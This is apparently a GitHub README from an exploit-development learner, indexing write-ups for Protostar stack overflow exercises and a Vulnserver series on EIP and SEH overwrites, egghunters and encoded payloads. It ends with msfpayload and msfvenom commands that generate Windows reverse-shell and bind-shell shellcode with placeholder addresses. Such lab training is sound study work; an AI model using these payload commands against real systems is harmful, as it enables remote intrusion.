README.md

August 29, 2020 ยท View on GitHub

Exploit Writeups

Exploit Exercise (Protostar)

ModuleLinkNote
Stack0Stack BOF IntroN/A
Stack1Stack BOF Basic1N/A
Stack2Stack BOF Basic2N/A
Stack3Stack BOF Basic3N/A
Stack4Stack BOF Basic4N/A
Stack5Stack BOF Shellcode
Stack6Stack BOF ret2libcROP is no need for OSCE
Stack7Stack BOF ret2.textROP is no need for OSCE. But learn POP; POP; RET concept with this

Vulnserver (Vulnserver)

SeriesLinkCommandVulnerabilityNote
Part 1ReadN/AN/ALab Setup
Part 2ReadTRUNEIP Overwrite
Part 3ReadGMONSEH Overwrite + Short JMP + Egghunter
Part 4ReadKSTETEIP Overwrite + Short JMP + Egghunter
Part 5ReadHTEREIP Overwrite + Restricted Characters + Manual Offset Finding
Part 6ReadGTEREIP Overwrite + Socket Reuse Exploit
Part 7ReadLTERSEH Overwrite + Restricted Characters + Encoded Payloads

Reviews

Github

Resources

Reverse Shell

Windows XP/Vista Ultimate

/pentest/exploits/framework/msfpayload windows/shell_reverse_tcp LHOST=192.168.x.x LPORT=443 C

Later Windows

/pentest/exploits/framework/msfpayload windows/shell_reverse_tcp LHOST=192.168.x.x LPORT=443 C 

msfvenom -p windows/shell_reverse_tcp LHOST=1192.168.x.x LPORT=443 -a x86 --platform=win -e x86/alpha_mixed -f raw

Bind Shell

Windows XP/Vista Ultimate

msfpayload windows/shell_bind_tcp R > bind
msfencode -e x86/alpha_mixed -i bind -t perl

Later Windows

msfvenom -p windows/shell_bind_tcp -a x86 --platform=win -e x86/alpha_mixed -f perl